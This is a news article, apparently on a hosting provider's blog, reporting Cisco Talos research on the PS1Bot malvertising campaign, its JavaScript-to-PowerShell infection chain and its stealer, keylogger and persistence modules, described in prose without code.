Cybersecurity researchers have recently uncovered a new malvertising campaign targeting victims with a multi-stage malware framework known as PS1Bot. The framework is designed to perform a variety of malicious activities on infected systems, including information theft, keylogging, reconnaissance, and establishing persistent access.
According to Cisco Talos researchers, PS1Bot incorporates advanced stealth techniques to minimize the traces left on infected systems. It employs an in-memory execution method for its follow-on modules, which prevents these components from being written to disk. Since early 2025, this malware has been active, using malvertising and SEO poisoning as its primary vectors for propagation.
The initial infection point comes through a compressed archive delivered to victims, which contains a JavaScript payload. This payload serves as a downloader that retrieves a PowerShell script from an external server, which is then executed on the infected machine.
The PowerShell script is crucial as it connects to a command-and-control (C2) server to fetch subsequent commands. The malware has various modules that allow operators to carry out extensive actions, such as:
- Antivirus Detection: Collecting and reporting installed antivirus programs on the infected system.
- Screen Capture: Taking screenshots from the infected device and sending the images back to the C2 server.
- Wallet Grabber: Stealing sensitive information from web browsers, cryptocurrency wallet applications, and files containing passwords or wallet seed phrases.
- Keylogger: Recording keystrokes and clipboard content.
- Information Collection: Gathering environmental data about the infected system to send to the attackers.
- Persistence: Creating scripts to ensure the malware runs again after system restarts.
The information-stealer module uses a list of common words to target files that may contain passwords and cryptocurrency wallet seed phrases for exfiltration.
The campaign also shares technical similarities with AHK Bot, previously utilized by threat actors like Asylum Ambuscade and TA866. Additionally, it overlaps with earlier ransomware campaigns using a malware named Skitnet, aimed at data theft and remote system control.
In a related note, Google has announced its efforts to combat invalid traffic by employing artificial intelligence systems that enhance their ability to analyze app and web content, as well as ad placements, effectively reducing fraudulent activities.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.